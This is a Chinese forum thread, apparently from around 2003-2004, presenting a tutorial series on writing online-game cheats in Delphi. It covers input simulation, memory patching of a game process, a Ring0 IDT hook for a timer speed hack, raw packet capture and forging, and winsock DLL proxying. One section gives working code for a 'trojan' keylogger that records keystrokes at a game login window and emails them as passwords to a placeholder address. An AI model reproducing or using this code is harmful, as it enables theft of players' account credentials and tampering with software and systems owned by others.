;在它的dwFlags处，可用的事件很多如移动MOUSEEVENTF_MOVE，左键按下MOUSEEVENTF_LEFTDOWN，左键放开MOUSEEVENTF_LEFTUP，具体的东东还是查一下MSDN吧~~~~~好了，有了以前的知识，我们就可以来看看人物移走是怎么实现的了： getcursorpos(point); setcursorpos(ranpoint(80,windowX),ranpoint(80,windowY));//ranpoint是个自制的随机坐标函数 mouse_event(MOUSEEVENTF_LEFTDOWN,0,0,0,0); mouse_event(MOUSEEVENTF_LEFTUP,0,0,0,0); setcursorpos(point.x,point.y);看了以上的代码，是不是觉得人物的游走很简单啦~~，举一仿三，还有好多好东东可以用这个技巧实现（我早就说过，TMD，这是垃圾外挂的做法，相信了吧~~~），接下来，再看看游戏里面自动攻击的做法吧（必需游戏中攻击支持快捷键的），道理还是一样的，只是用的API不同罢了~~~，这回我们要用到的是keybd_event函数，其用法如下：VOID keybd_event(   BYTE bVk, // virtual-key code   BYTE bScan, // hardware scan code   DWORD dwFlags, // flags specifying various function options   DWORD dwExtraInfo  // additional data associated with keystroke &nbsp

;我们还要知道扫描码不可以直接使用，要用函数MapVirtualKey把键值转成扫描码，MapVirtualKey的具体使用方法如下：UINT MapVirtualKey(   UINT uCode, // virtual-key code or scan code   UINT uMapType  // translation to perform &nbsp

;好了，比说此快接键是CTRL+A，接下来让我们看看实际代码是怎么写的： keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),0,0); keybd_event(65,mapvirtualkey(65,0),0,0); keybd_event(65,mapvirtualkey(65,0),keyeventf_keyup,0); keybd_event(VK_CONTROL,mapvirtualkey(VK_CONTROL,0),keyeventf_keyup,0);首先模拟按下了CTRL键，再模拟按下A键，再模拟放开A键，最后放开CTRL键，这就是一个模拟按快捷键的周期。（看到这里，差不多对简易外挂有了一定的了解了吧~~~~做一个试试？如果你举一仿三还能有更好的东东出来，这就要看你的领悟能力了~~，不过不要高兴太早这只是才开始，以后还有更复杂的东东等着你呢~~）   2003-5-15 10:36:05    上回我们对动作式外挂做了一个解析，动作式是最简单的外挂，现在我们带来看看，比动作式外挂更进一步的外挂——本地修改式外挂的整个制作过程进行一个详细的分解。   具我所知，本地修改式外挂最典型的应用就是在“精灵”游戏上面，因为我在近一年前（“精灵”还在测试阶段），我所在的公司里有很多同事玩“精灵”，于是我看了一下游戏的数据处理方式，发现它所发送到服务器上的信息是存在于内存当中（我看后第一个感受是：修改这种游戏和修改单机版的游戏没有多大分别，换句话说就是在他向服务器提交信息之前修改了内存地址就可以了），当时我找到了地址于是修改了内存地址，果然，按我的想法修改了地址，让系统自动提交后，果然成功了~~~~~，后来“精灵”又改成了双地址校检，内存校检等等，在这里我就不废话了~~~~，OK，我们就来看看这类外挂是如何制作的：   在做外挂之前我们要对Windows的内存有个具体的认识，而在这里我们所指的内存是指系统的内存偏移量，也就是相对内存，而我们所要对其进行修改，那么我们要对几个Windows API进行了解，OK，跟着例子让我们看清楚这种外挂的制作和API的应用（为了保证网络游戏的正常运行，我就不把找内存地址的方法详细解说了）：   1、首先我们要用FindWindow,知道游戏窗口的句柄，因为我们要通过它来得知游戏的运行后所在进程的ID，下面就是FindWindow的用法：HWND FindWindow(   LPCTSTR lpClassName, // pointer to class name   LPCTSTR lpWindowName  // pointer to window name &nbsp

;   2、我们GetWindowThreadProcessId来得到游戏窗口相对应进程的进程ID，函数用法如下：DWORD GetWindowThreadProcessId(   HWND hWnd, // handle of window   LPDWORD lpdwProcessId  // address of variable for process identifier &nbsp

;   3、得到游戏进程ID后，接下来的事是要以最高权限打开进程，所用到的函数OpenProcess的具体使用方法如下：HANDLE OpenProcess(   DWORD dwDesiredAccess, // access flag    BOOL bInheritHandle, // handle inheritance flag    DWORD dwProcessId  // process identifier   );   在dwDesiredAccess之处就是设存取方式的地方，它可设的权限很多，我们在这里使用只要使用PROCESS_ALL_ACCESS 来打开进程就可以，其他的方式我们可以查一下MSDN。   4、打开进程后，我们就可以用函数对存内进行操作，在这里我们只要用到WriteProcessMemory来对内存地址写入数据即可（其他的操作方式比如说：ReadProcessMemory等，我在这里就不一一介绍了），我们看一下WriteProcessMemory的用法：BOOL WriteProcessMemory(   HANDLE hProcess, // handle to process whose memory is written to     LPVOID lpBaseAddress, // address to start writing to    LPVOID lpBuffer, // pointer to buffer to write data to   DWORD nSize, // number of bytes to write   LPDWORD lpNumberOfBytesWritten  // actual number of bytes written   );   5、下面用CloseHandle关闭进程句柄就完成了。   这就是这类游戏外挂的程序实现部份的方法，好了，有了此方法，我们就有了理性的认识，我们看看实际例子，提升一下我们的感性认识吧，下面就是XX游戏的外挂代码，我们照上面的方法对应去研究一下吧：const ResourceOffset: dword = $004219F4; resource: dword = 3113226621; ResourceOffset1: dword = $004219F8; resource1: dword = 1940000000; ResourceOffset2: dword = $0043FA50; resource2: dword = 1280185; ResourceOffset3: dword = $0043FA54; resource3: dword = 3163064576; ResourceOffset4: dword = $0043FA58; resource4: dword = 2298478592;var hw: HWND; pid: dword; h: THandle; tt: Cardinal;begin hw := FindWindow('XX', nil); if hw = 0 then   Exit; GetWindowThreadProcessId(hw, @pid); h := OpenProcess(PROCESS_ALL_ACCESS, false, pid); if h = 0 then   Exit; if flatcheckbox1.Checked=true then begin   WriteProcessMemory(h, Pointer(ResourceOffset), @Resource, sizeof(Resource), tt);   WriteProcessMemory(h, Pointer(ResourceOffset1), @Resource1, sizeof(Resource1), tt); end; if flatcheckbox2.Checked=true then begin   WriteProcessMemory(h, Pointer(ResourceOffset2), @Resource2, sizeof(Resource2), tt);   WriteProcessMemory(h, Pointer(ResourceOffset3), @Resource3, sizeof(Resource3), tt);   WriteProcessMemory(h, Pointer(ResourceOffset4), @Resource4, sizeof(Resource4), tt); end; MessageBeep(0); CloseHandle(h); close;   这个游戏是用了多地址对所要提交的数据进行了校验，所以说这类游戏外挂制作并不是很难，最难的是要找到这些地址。   2003-5-15 10:37:27    以前介绍过的动作式，本地修改式外挂是真正意义上的外挂，而今天本文要介绍的木马式外挂，可能大多像木马吧，是帮助做外挂的人偷取别人游戏的帐号及密码的东东。因为网络上有此类外挂的存在，所以今天不得不说一下（我个人是非常讨厌这类外挂的，请看过本文的朋友不要到处乱用此技术，谢谢合作）。要做此类外挂的程序实现方法很多（比如HOOK，键盘监视等技术），因为HOOK技术对程序员的技术要求比较高并且在实际应用上需要多带一个动态链接库，所以在文中我会以键盘监视技术来实现此类木马的制作。键盘监视技术只需要一个.exe文件就能实现做到后台键盘监视，这个程序用这种技术来实现比较适合。   在做程序之前我们必需要了解一下程序的思路：   1、我们首先知道你想记录游戏的登录窗口名称。   2、判断登录窗口是否出现。   3、如果登录窗口出现，就记录键盘。   4、当窗口关闭时，把记录信息，通过邮件发送到程序设计者的邮箱。   第一点我就不具体分析了，因为你们比我还要了解你们玩的是什么游戏，登录窗口名称是什么。从第二点开始，我们就开始这类外挂的程序实现之旅：   那么我们要怎么样判断登录窗口虽否出现呢？其实这个很简单，我们用FindWindow函数就可以很轻松的实现了：   HWND FindWindow(     LPCTSTR lpClassName, // pointer to class name     LPCTSTR lpWindowName  // pointer to window name   &nbsp

;   实际程序实现中，我们要找到'xx'窗口，就用FindWindow(nil,'xx')如果当返回值大于0时表示窗口已经出现，那么我们就可以对键盘信息进行记录了。   先首我们用SetWindowsHookEx设置监视日志，而该函数的用法如下：HHOOK SetWindowsHookEx(   int idHook, // type of hook to install   HOOKPROC lpfn, // address of hook procedure   HINSTANCE hMod, // handle of application instance   DWORD dwThreadId  // identity of thread to install hook for   );    在这里要说明的是在我们程序当中我们要对HOOKPROC这里我们要通过写一个函数，来实现而HINSTANCE这里我们直接用本程序的HINSTANCE就可以了，具体实现方法为：hHook := SetWindowsHookEx(WH_JOURNALRECORD, HookProc, HInstance, 0);    而HOOKPROC里的函数就要复杂一点点：function HookProc(iCode: integer; wParam: wParam; lParam: lParam): LResult; stdcall; begin if findedtitle then   //如果发现窗口后begin  if (peventmsg(lparam)^.message = WM_KEYDOWN) then  //消息等于键盘按下  hookkey := hookkey + Form1.Keyhookresult(peventMsg(lparam)^.paramL, peventmsg(lparam)^.paramH); //通过keyhookresult（自定义的函数，主要功能是转换截获的消息参数为按键名称。我会在文章尾附上转化函数的）转换消息。 if length(hookkey) > 0 then  //如果获得按键名称 begin   Write(hookkeyFile,hookkey); //把按键名称写入文本文件  hookkey := '';  end; end; end;    以上就是记录键盘的整个过程，简单吧，如果记录完可不要忘记释放呀，UnHookWindowsHookEx(hHook)，而hHOOK,就是创建setwindowshookex后所返回的句柄。   我们已经得到了键盘的记录，那么现在最后只要把记录的这些信息发送回来，我们就大功造成了。其他发送这块并不是很难，只要把记录从文本文件里边读出来，用DELPHI自带的电子邮件组件发一下就万事OK了。代码如下：  assignfile(ReadFile,'hook.txt'); //打开hook.txt这个文本文件  reset(ReadFile); //设为读取方式  try    While not Eof(ReadFile) do //当没有读到文件尾   begin     Readln(ReadFile,s,j); //读取文件行    body:=body+s;    end;   finally    closefile(ReadFile); //关闭文件  end;   nmsmtp1.EncodeType:=uuMime; //设置编码  nmsmtp1.PostMessage.Attachments.Text:=''; //设置附件  nmsmtp1.PostMessage.FromAddress:='XXX@XXX.com'; //设置源邮件地址  nmsmtp1.PostMessage.ToAddress.Text:='XXX@XXX.com'; /设置目标邮件地址  nmsmtp1.PostMessage.Body.Text:='密码'+' '+body; //设置邮件内容  nmsmtp1.PostMessage.Subject:='password'; //设置邮件标题  nmsmtp1.SendMail; //发送邮件   2003-5-15 10:38:09    我一直没有搞懂制作加速外挂是怎么一回事，直到前不久又翻出来了2001年下半期的《程序员合订本》中《“变速齿轮”研究手记》重新回味了一遍，才有了一点点开悟，随后用Delphi重写了一遍，下面我就把我的心得说给大家听听，并且在此感谢《“变速齿轮”研究手记》作者褚瑞大虲给了提示。废话我就不多说了，那就开始神奇的加速型外挂体验之旅吧！原本我一直以为加速外挂是针对某个游戏而写的，后来发现我这种概念是不对的，所谓加速外挂其实是修改时钟频率达到加速的目的。以前DOS时代玩过编程的人就会马上想到，这很简单嘛不就是直接修改一下8253寄存器嘛，这在以前DOS时代可能可以行得通，但是windows则不然。windows是一个32位的操作系统，并不是你想改哪就改哪的（微软的东东就是如此霸气，说不给你改就不给你改^_^），但要改也不是不可能，我们可以通过两种方法来实现：第一是写一个硬件驱动来完成，第二是用Ring0来实现（这种方法是CIH的作者陈盈豪首用的，它的原理是修改一下IDT表->创建一个中断门->进入Ring0->调用中断修改向量，但是没有办法只能用ASM汇编来实现这一切*_*，做为高级语言使用者惨啦！），用第一种方法用点麻烦，所以我们在这里就用第二种方法实现吧~~~在实现之前我们来理一下思路吧：1、我们首先要写一个过程在这个过程里嵌入汇编语言来实现修改IDE表、创建中断门，修改向量等工作2、调用这个过程来实现加速功能好了，现在思路有了，我们就边看代码边讲解吧：首先我们建立一个过程，这个过程就是本程序的核心部份：procedure SetRing(value:word); stdcall;  const ZDH = $03;        ／／设一个中断号var IDT : array [0..5] of byte; ／／保存IDT表 OG : dword;          ／／存放旧向量begin  asm    push ebx    sidt IDT                  ／／读入中断描述符表    mov ebx, dword ptr [IDT+2] ／／IDT表基地址    add ebx, 8*ZDH  ／／计算中断在中断描述符表中的位置    cli                       ／／关中断    mov dx, word ptr [ebx+6]     shl edx, 16d                  mov dx, word ptr [ebx]        mov [OG], edx          mov eax, offset @@Ring0   ／／指向Ring0级代码段    mov word ptr [ebx], ax        ／／低16位,保存在1,2位    shr eax, 16d    mov word ptr [ebx+6], ax      ／／高16位，保存在6,7位    int ZDH             ／／中断    mov ebx, dword ptr [IDT+2]    ／／重新定位    add ebx, 8*ZDH    mov edx, [OG]    mov word ptr [ebx], dx    shr edx, 16d    mov word ptr [ebx+6], dx      ／／恢复被改了的向量    pop ebx    jmp @@exitasm ／／到exitasm处   @@Ring0:    ／／Ring0,这个也是最最最核心的东东     mov al,$34    ／／写入8253控制寄存器     out $43,al     mov ax,value　／／写入定时值     out $40,al    ／／写定时值低位     mov al,ah     out $40,al    ／／写定时值高位     iretd         ／／返回  @@exitasm:  end;end;最核心的东西已经写完了，大部份读者是知其然不知其所以然吧，呵呵，不过不知其所以然也然。下面我们就试着用一下这个过程来做一个类似于“变速齿轮”的一个东东吧！先加一个窗口，在窗口上放上一个trackbar控件把其Max设为20，Min设为1，把Position设为10，在这个控件的Change事件里写上：SetRing(strtoint('$'+inttostr(1742+(10-trackbar1.Position)*160)));因为windows默认的值为$1742，所以我们把1742做为基数，又因为值越小越快，反之越慢的原理，所以写了这样一个公式，好了，这就是“变速齿轮”的一个Delphi＋ASM版了（只适用于win9X），呵呵，试一下吧，这对你帮助会很大的，呵呵。在win2000里，我们不可能实现在直接对端口进行操作，Ring0也失了效，有的人就会想到，我们可以写驱动程序来完成呀，但在这里我告诉你，windows2000的驱动不是一个VxD就能实现的，像我这样的低手是写不出windows所用的驱动WDM的，没办法，我只有借助外力实现了，ProtTalk就是一个很好的设备驱动，他很方便的来实现对低层端口的操作，从而实现加速外挂。1、我们首先要下一个PortTalk驱动，他的官方网站是http://www.beyondlogic.org2、我们要把里面的prottalk.sys拷贝出来。3、建立一个Protalk.sys的接口（我想省略了，大家可以上http://www.freewebs.com/liuyue/porttalk.pas下个pas文件自己看吧）4、实现加速外挂。本来就篇就是补充篇原理我也不想讲太多了，下面就讲一下这程序的实现方法吧，如果说用ProtTalk来操作端口就容易多了，比win98下用ring权限操作方便。1、新建一个工程，把刚刚下的接口文件和Protalk.sys一起拷到工程文件保存的文件夹下。2、我们在我们新建的工程加入我们的接口文件 uses   windows,ProtTalk……3、我们建立一个过程procedure SetRing(value:word); begin if not OpenPortTalk then exit; outportb($43,$34); outportb($40,lo(Value)); outprotb($40,hi(value)); ClosePortTalk;end;4、先加一个窗口，在窗口上放上一个trackbar控件把其Max设为20，Min设为1，把Position设为10，在这个控件的Change事件里写上：SetRing(strtoint('$'+inttostr(1742+(10-trackbar1.Position)*160)));   2003-5-18 22:57:57       网络游戏的封包技术是大多数编程爱好者都比较关注的关注的问题之一，在这一篇里就让我们一起研究一下这一个问题吧。   别看这是封包这一问题，但是涉及的技术范围很广范，实现的方式也很多（比如说APIHOOK,VXD,Winsock2都可以实现），在这里我们不可能每种技术和方法都涉及，所以我在这里以Winsock2技术作详细讲解，就算作抛砖引玉。   由于大多数读者对封包类编程不是很了解，我在这里就简单介绍一下相关知识：   APIHooK：   由于Windows的把内核提供的功能都封装到API里面，所以大家要实现功能就必须通过API，换句话说就是我们要想捕获数据封包，就必须先要得知道并且捕获这个API，从API里面得到封包信息。   VXD：   直接通过控制VXD驱动程序来实现封包信息的捕获，不过VXD只能用于win9X。   winsock2：   winsock是Windows网络编程接口，winsock工作在应用层，它提供与底层传输协议无关的高层数据传输编程接口，winsock2是winsock2.0提供的服务提供者接口，但只能在win2000下用。   好了，我们开始进入winsock2封包式编程吧。   在封包编程里面我准备分两个步骤对大家进行讲解：1、封包的捕获，2、封包的发送。   首先我们要实现的是封包的捕获：   Delphi的封装的winsock是1.0版的，很自然winsock2就用不成。如果要使用winsock2我们要对winsock2在Delphi里面做一个接口，才可以使用winsock2。   1、如何做winsock2的接口？   1）我们要先定义winsock2.0所用得到的类型，在这里我们以WSA_DATA类型做示范，大家可以举一仿三的来实现winsock2其他类型的封装。   我们要知道WSA_DATA类型会被用于WSAStartup(wVersionRequired: word; var WSData: TWSAData): Integer;，大家会发现WSData是引用参数，在传入参数时传的是变量的地址，所以我们对WSA_DATA做以下封装： const    WSADESCRIPTION_LEN     =   256;    WSASYS_STATUS_LEN      =   128;  type    PWSA_DATA = ^TWSA_DATA;    WSA_DATA = record      wVersion: Word;      wHighVersion: Word;      szDescription: array[0..WSADESCRIPTION_LEN] of Char;      szSystemStatus: array[0..WSASYS_STATUS_LEN] of Char;      iMaxSockets: Word;      iMaxUdpDg: Word;      lpVendorInfo: PChar;    end;    TWSA_DATA = WSA_DATA;    2）我们要从WS2_32.DLL引入winsock2的函数，在此我们也是以WSAStartup为例做函数引入：  function WSAStartup(wVersionRequired: word; var WSData: TWSAData): Integer; stdcall;  implementation   const WinSocket2 = 'WS2_32.DLL';   function WSAStartup; external winsocket name 'WSAStartup';   通过以上方法，我们便可以对winsock2做接口，下面我们就可以用winsock2做封包捕获了，不过首先要有一块网卡。因为涉及到正在运作的网络游戏安全问题，所以我们在这里以IP数据包为例做封包捕获，如果下面的某些数据类型您不是很清楚，请您查阅MSDN：   1）我们要起动WSA，这时个要用到的WSAStartup函数，用法如下：INTEGER WSAStartup(                  wVersionRequired: word，                  WSData: TWSA_DATA                 )；   2）使用socket函数得到socket句柄，m_hSocket:=Socket(AF_INET, SOCK_RAW, IPPROTO_IP); 用法如下：INTEGER socket(af: Integer,               Struct: Integer,               protocol: Integer             );   m_hSocket:=Socket(AF_INET, SOCK_RAW, IPPROTO_IP);在程序里m_hSocket为socket句柄，AF_INET，SOCK_RAW，IPPROTO_IP均为常量。   3)定义SOCK_ADDR类型，跟据我们的网卡IP给Sock_ADDR类型附值，然后我们使用bind函数来绑定我们的网卡，Bind函数用法如下：Type    IN_ADDR = record    S_addr : PChar;  End;Type   TSOCK_ADDR = record    sin_family: Word;   sin_port: Word;   sin_addr : IN_ADDR   sin_zero: array[0..7] of Char;   End;var LocalAddr:TSOCK_ADDR; LocalAddr.sin_family: = AF_INET; LocalAddr.sin_port: = 0; LocalAddr.sin_addr.S_addr: = inet_addr('192.168.1.1'); ／／这里你自己的网卡的IP地址,而inet_addr这个函数是winsock2的函数。 bind(m_hSocket, LocalAddr, sizeof(LocalAddr))；   4)用WSAIoctl来注册WSA的输入输出组件，其用法如下：INTEGER WSAIoctl(s:INTEGER,                 dwIoControlCode : INTEGER,                 lpvInBuffer :INTEGER,                cbInBuffer : INTEGER,                 lpvOutBuffer : INTEGER,                cbOutBuffer: INTEGER,                 lpcbBytesReturned : INTEGER,                 lpOverlapped : INTEGER,                 lpCompletionRoutine : INTEGER               );   5)下面做死循环，在死循环块里，来实现数据的接收。但是徇环中间要用Sleep()做延时，不然程序会出错。   6)在循环块里，用recv函数来接收数据，recv函数用法如下：INTEGER recv (s : INTEGER,              buffer:Array[0..4095] of byte,              length : INTEGER,             flags : INTEGER,           &nbsp

；   7)在buffer里就是我们接收回来的数据了，如果我们想要知道数据是什么地方发来的，那么，我们要定义一定IP包结构，用CopyMemory()把IP信息从buffer里面读出来就可以了，不过读出来的是十六进制的数据需要转换一下。   看了封包捕获的全过程序，对你是不是有点起发，然而在这里要告诉大家的是封包的获得是很容易的，但是许多游戏的封包都是加密的，如果你想搞清楚所得到的是什么内容还需要自己进行封包解密。   2003-6-7 23:17:38    在本章中，我们主要来研究一下封包的制作和发送，同样，我们所采用的方法是Delphi+winsock2来制作。在以前说过在Delphi中只封装了winsock1，winsock2需要自已封装一下，我在此就不多介绍如何封装了。下面就一步步实现我们的封包封装与发送吧：首先，我们应该知道，封包是分两段的，一段是IP，一段是协议（TCP，UDP，其他协议），IP就像邮政编码一样，标识着你的这个封包是从哪里到哪里，而协议里记录着目标所要用到的包的格式及校验等，在网络游戏中的协议一般都是自已定义的，要破解网络游戏最重要的是学会破解网络游戏的协议网络游戏协议破解，为了不影响现运行的网络游戏的安全，我在此会以UDP协议为例，介绍一下网络协议的封包与发送的全过程。接下来，我们就可以开始看看整个封包全过程了：   1）我们要起动sock2，这时个要用到的WSAStartup函数，用法如下：INTEGER WSAStartup(                  wVersionRequired: word，                  WSData: TWSA_DATA                 )；在程序中wVersionRequired我们传入的值为$0002,WSData为TWSA_DATA的结构。   2）使用socket函数创建并得到socket句柄; 用法如下：INTEGER socket(af: Integer,               Struct: Integer,               protocol: Integer             );  注意的是在我们的程序封包中饱含了IP包头，所以我们的Struct参数这里要传入的参数值为2，表示包含了包头。该函数返回值为刚刚创建的winsocket的句柄。   3）使用setsockopt函数设置sock的选项; 用法如下：INTEGER setsockopt(s: Integer,                  level: Integer,                   optname: Integer,                  optval: PChar,                  optlen: Integer                 ); 在S处传入的是Socket句柄，在本程序里level输入的值为0表示IP（如果是6表示TCP，17表示UDP等~），OptName里写入2，而optval的初始值填入1，optlen为optval的大小。   4）接下来我们要分几个步骤来实现构建封包： 1、把IP转换成sock地址，用inet_addr来转换。Longint  inet_addr(                  cp: PChar                 ); 2、定义包的总大小、IP的版本信息为IP结构：    总包大小=IP头的大小+UDP头的大小+UDP消息的大小，    IP的版本，在此程序里定义为4， 3、填写IP包头的结构：     ip.ipverlen := IP的版本 shl 4;      ip.iptos := 0;                // IP服务类型     ip.iptotallength := ;         // 总包大小      ip.ipid := 0;                 // 唯一标识，一般设置为0     ip.ipoffset := 0;             // 偏移字段      ip.ipttl := 128;              // 超时时间     ip.ipprotocol := $11;         // 定义协议      ip.ipchecksum := 0 ;          // 检验总数     ip.ipsrcaddr := ;             // 源地址     ip.ipdestaddr := ;            // 目标地址 4、填写UDP包头的结构：     udp.srcportno := ;            //源端口号     udp.dstportno := ;            //目标端口号     udp.udplength := ;            //UDP包的大小     udp.udpchecksum :=  ;         //检验总数 5、把IP包头，UDP包头及消息，放入缓存。 6、定义远程信息：     remote.family := 2;      remote.port :=;               //远程端口     remote.addr.addr :=;          //远程地址   5）我们用SendTo发送封包，用法如下：  INTEGER sendto(s: Integer,              var Buf: Integer,              var len: Integer,              var flags: Integer,               var addrto: TSock_Addr;               tolen: Integer             );  在S处传入的是Socket句柄,Buf是刚刚建好的封包，len传入封包的总长度刚刚计算过了，flag是传入标记在这里我们设为0，addto发送到的目标地址，在这里我们就传入remote就可以了，tolen写入的是remote的大小。     6）到了最后别忘记了用CloseSocket(sh)关了socket和用WSACleanup关了winsock。最后要说的是这种发送方式，只能发送完全被破解的网络协议，如果要在别人的程序中间发送数据就只有用APIHOOK或在winsock2做中间层了。如果大家还有什么问题需要和我讨论，请发邮件到microprogramer@hotmail.com或加QQ：24259132。 来自: seucag, 时间: 2003-11-23 12:23:00, ID: 2311409   外挂分析 转自网络) 我主要对外挂的技术进行分析,至于游戏里面的内部结构每个都不一样,这里就不做讲解了,我也没有那么厉害,所有的都知道,呵呵! 1 首先游戏外挂的原理 外挂现在分为好多种,比如模拟键盘的,鼠标的,修改数据包的,还有修改本地内存的,但好像没有修改服务器内存的哦,呵呵!其实修改服务器也是有办法的,只是技术太高一般人没有办法入手而已!(比如请GM去夜总会,送礼,收黑钱等等办法都可以修改服务器数据,哈哈)  修改游戏无非是修改一下本地内存的数据,或者截获api函数等等,这里我把所能想到的方法都作一个介绍,希望大家能做出很好的外挂来使游戏厂商更好的完善自己的技术. 我见到一片文章是讲魔力宝贝的理论分析,写的不错,大概是那个样子. 下来我就讲解一下技术方面的东西,以作引玉之用 2 技术分析部分 1 模拟键盘或鼠标的响应 我们一般使用UINT SendInput( UINT nInputs,     // count of input events LPINPUT pInputs,  // array of input events int cbSize        // size of structure );api函数 第一个参数是说明第二个参数的矩阵的维数的,第二个参数包含了响应事件,这个自己填充就可以,最后是这个结构的大小,非常简单,这是最简单的方法模拟键盘鼠标了,呵呵 注意:这个函数还有个替代函数: VOID keybd_event( BYTE bVk,               // 虚拟键码 BYTE bScan,             // 扫描码 DWORD dwFlags,           ULONG_PTR dwExtraInfo   // 附加键状态 );和 VOID mouse_event( DWORD dwFlags,         // motion and click options DWORD dx,              // horizontal position or change DWORD dy,              // vertical position or change DWORD dwData,          // wheel movement ULONG_PTR dwExtraInfo  // application-defined information ); 这两个函数非常简单了,我想那些按键精灵就是用的这个吧,呵呵,上面的是模拟键盘,下面的是模拟鼠标的. 这个仅仅是模拟部分,要和游戏联系起来我们还需要找到游戏的窗口才行,或者包含快捷键,就象按键精灵的那个激活键一样,我们可以用GetWindow函数来枚举窗口,也可以用Findwindow函数来查找制定的窗口(注意还有一个FindWindowEx),FindwindowEx可以找到窗口的子窗口,比如按钮,等什么东西.当游戏切换场景的时候我们可以用FindWindowEx来确定一些当前窗口的特征,从而判断是否还在这个场景,方法很多了,比如可以GetWindowInfo来确定一些东西,比如当查找不到某个按钮的时候就说明游戏场景已经切换了,等等办法.有的游戏没有控件在里面,这是对图像做坐标变换的话,这种方法就要受到限制了.这就需要我们用别的办法来辅助分析了. 至于快捷键我们要用动态连接库实现了,里面要用到hook技术了,这个也非常简单,大家可能都会了,其实就是一个全局的hook对象然后SetWindowHook就可以了,回调函数都是现成的,而且现在网上的例子多如牛毛,这个实现在外挂中已经很普遍了.如果还有谁不明白,那就去看看msdn查找SetWindowHook就可以了. 这个动态连接库的作用很大,不要低估了哦,它可以切入所有的进程空间,也就是可以加载到所有的游戏里面哦,只要用对,你会发现很有用途的! 这个需要你复习一下win32编程的基础知识了,呵呵,赶快去看书吧! 2截获消息 有些游戏的响应机制比较简单,是基于消息的,或者用什么定时器的东西,这个时候你就可以用拦截消息来实现一些有趣的功能了. 我们拦截消息使用的也是hook技术,里面包括了键盘消息,鼠标消息,系统消息,日志等,别的对我们没有什么大的用处,我们只用拦截消息的回调函数就可以了,这个不会让我写例子吧,其实这个和上面的一样,都是用SetWindowHook来写的,看看就明白了很简单的. 至于拦截了以后做什么就是你的事情了,比如在每个定时器消息里面处理一些我们的数据判断,或者在定时器里面在模拟一次定时器,那么有些数据就会处理两次,呵呵,后果嘛,不一定是好事情哦,呵呵,不过如果数据计算放在客户端的游戏就可以真的改变数据了,呵呵,试试看吧!用途还有很多,自己想也可以想出来的,呵呵! 3拦截socket包 这个技术难度要比原来的高很多哦,要有思想准备. 首先我们要替换winSock.dll或者winsock32.dll,我们写的替换函数要和原来的函数一致才行,就是说它的函数输出什么样的,我们也要输出什么样子的函数,而且参数,参数顺序都要一样才行,然后在我们的函数里面调用真正的winSock32.dll里面的函数就可以了 首先:我们可以替换动态库到系统路径 其次:我们应用程序启动的时候可以加载原有的动态库,用这个函数LoadLibary 然后定位函数入口用GetProcAddress函数获得每个真正socket函数的入口地址 当游戏进行的时候它会调用我们的动态库,然后从我们的动态库中处理完毕后才跳转到真正动态库的函数地址,这样我们就可以在里面处理自己的数据了,应该是一切数据.呵呵! 兴奋吧,拦截了数据包我们还要分析之后才能进行正确的应答,不要以为这样工作就完成了,呵呵!还早呢,等分析完毕以后我们还要仿真应答机制来和服务器通信,一个不小心就会被封号,呵呵,呜~~~~~~~~我就被封了好多啊! 分析数据才是工作量的来源呢,游戏每次升级有可能加密方式会有所改变,因此我们写外挂的人都是亡命之徒啊,被人娱乐了还不知道,呵呵!(声明我可没有赚钱,我是免费的) 好了,给大家一个不错的起点,这里有完整的替换socket源代码,呵呵! http://www.vchelp.net/vchelp/zsrc/wsock32_sub.zip 4截获api 上面的技术如果可以灵活运用的话我们就不用截获api函数了,其实这种技术是一种补充技术.比如我们需要截获socket以外的函数作为我们的用途,我们就要用这个技术了,其实我们也可以用它直接拦截在socket中的函数,这样更直接. 现在拦截api的教程到处都是,我就不列举了,我用的比较习惯的方法是根据输入节进行拦截的,这个方法可以用到任何一种操作系统上,比如98/2000等,有些方法不是跨平台的,我不建议使用.这个技术大家可以参考windows核心编程里面的545页开始的内容来学习,如果是98系统可以用window系统奥秘那个最后一章来学习. 好了方法就是这么多了,看大家怎么运用了,其它的一些针对性的技巧这里我就不说了,要不然会有人杀了我的,呵呵! 记住每个游戏的修改方法都不一样,如果某个游戏数据处理全部在服务器端,那么你还是别写外挂了,呵呵,最多写个自动走路的外挂,哈哈! 数据分析的时候大家一定要注意,不要轻易尝试和服务器的连接,因为那有很危险,切忌!等你掌握了大量的数据分析结果以后,比较有把握了在试试,看看你的运气好不好,很有可能会成功的哦,呵呵! 其实像网金也疯狂的那种模拟客户端的程序也是不错的,很适合office的人用,就看大家产品定位了. 好了不说了,大家努力吧!切忌不要被游戏厂商招安哦,那样有损我们的形象,我们是为了让游戏做的更好而开发的,也不愿意打乱游戏的平衡,哎,好像现在不是这样了!不说了随其自然吧! 来自: lukisy, 时间: 2003-11-26 12:18:00, ID: 2318016   我觉得问题远没有这么简单，随意拦截和解释就可以吗？ 有写出来的吗？ 来自: feier2004, 时间: 2004-03-12 15:42:18, ID: 2499606   学习，学习 来自: lukisy, 时间: 2004-03-12 15:49:00, ID: 2499647   接受答案了. 得分大富翁: feier2004

weiliu · 2006-07-25

问题: 坛子里的人有没有人搞外挂的？？？ ( 积分: 0 )   分类: 非技术问题   来自: shopman, 时间: 2004-01-22 18:25:00, ID: 2421340   说说内幕吧！！！！！ 来自: shopman, 时间: 2004-01-22 21:34:00, ID: 2421418   这个问题很敏感？？？？ 来自: lizhuo255, 时间: 2004-01-23 20:35:00, ID: 2421652   没有分说什么啊??? 我有点资料,可是,你不给分啊!!!! 来自: shopman, 时间: 2004-01-23 20:49:00, ID: 2421659   给给。。穷得只有分了!!! 来自: lizhuo255, 时间: 2004-01-23 21:54:00, ID: 2421676   呵呵,终于肯给分了!!!!你想知道什么????想知道多少???我也是只知道原理和部分实现过程,太深的怕是也帮不了你!!!!说清楚点,还有分数!!!呵呵 来自: shopman, 时间: 2004-01-23 22:23:00, ID: 2421691   我说不是那种内存补丁式的外挂，我说的是脱机挂! 不知道老大你有这方面的信息吗？分数真的好说，就是你一句话。 我最奇怪的还是那些外挂开发者有银行帐号和姓名为什么还抓不到人。即便这些银行 帐户信息全是假的你总要取钱吧，这些都是线索!!!! 即便抓不到人那为什么银行帐号不被查封!!!!？？？？ 为什么都在收人民币而不在国外银行开户收美元!! 为什么不让你的外挂通过点广告间接收费。 为什么非得要出售外挂而不开个代练网间接合法化的收钱。 其实从技术上说我可以逆向分析，但经验不足。更想了解的是市场环境!!! 来自: lizhuo255, 时间: 2004-01-23 22:26:00, ID: 2421699   晕,怎么这么多问题啊,可是要按数量收分的啊!!!! 来自: lizhuo255, 时间: 2004-01-23 22:31:00, ID: 2421700   